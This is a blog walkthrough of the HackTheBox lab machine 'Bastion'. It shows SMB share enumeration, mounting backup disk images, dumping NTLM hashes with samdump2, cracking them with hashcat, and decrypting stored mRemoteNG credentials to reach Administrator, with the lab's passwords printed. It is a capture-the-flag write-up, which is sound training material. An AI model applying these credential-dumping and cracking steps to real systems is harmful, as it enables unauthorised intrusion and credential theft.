You are currently viewing Bastion HTB Walkthrough

Bastion HTB Walkthrough

Bastion is an easy HackTheBox windows machine, in this article we’re going to discover how to get the user and root flags. Please follow me step by step and i hope everything will be clear !

let’s start our first scan :

1. Nmap result

Scanning with nmap command lead us to get these results : 

22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

We have SMB ports open, it’s time for enumeration. let’s use smbclient command :

$ smbclient  -L \\10.129.136.29

        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

It looks like we have an interesting share named “backups“, the result for listing :

$ smbclient  \\\\10.129.136.29\\backups
note.txt                         
SDT65CB.tmp             
WindowsImageBackup

let’s dive again, in “WindowsImageBackup” folder :

L4mpje-PC
├── Backup 2019-02-22 124351
├── Catalog
├── MediaId
└── SPPMetadataCache

after checking the “Backup 2019-02-22 124351”, we detected two big vhd files that we couldn’t download at first time, and after googling we managed to get the entire “backups” folder using this command :

$ smbclient  \\\\MACHINE_IP\\backups --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 3600

the download is too slow so i decided to switch to mount command :

 $ mount -t cifs //MACHINE_IP/backups /mnt/bastion -o user=,password=

after the download is complete, i mounted the two big VHD files in my machine using this tutorial

2. Exploitation and User flag

when the mount of the two vhd files is done, we are going to extract a copy of the “SAM” and “SYSTEM” files from the registry or a shadow copy. these files are located in windows/system32/config

we check the content of those files using samdump2 command :

$ samdump2 SYSTEM SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

That’s Great, we have some interesting information, let’s create a file with those hashes and pass it to hashcat command : 

$ hashcat samhash  /usr/share/wordlists/rockyou.txt -m 1000 

31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje

Great! now ssh port is open so we can get the user flag easily with those credentials “L4mpje:bureaulampje” :

$ ssh L4mpje@MACHINE_IP

3. Root Flag

After enumerating, we found mremoteng installed, and after some research we managed to get the “confCons.xml” file and used this python script to decrypt it’s content :

https://github.com/gquere/mRemoteNG_password_decrypt

scp command to copy the file to our machine : 

$ scp  L4mpje@MACHINE_IP:../../../Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml

python command to decrypt the file :

$ python mremoteng_decrypt.py  confCons.xml

Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2

Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje

Perfect ! now we use those credentials “Administrator:thXLHM96BeKL0ER2” to get th root flag from the administrator desktop !

hacked

Finally ! we managed to hack this easy windows machine, i hope you do so following these steps.

if you have any question or detail to add please feel free to contact me here.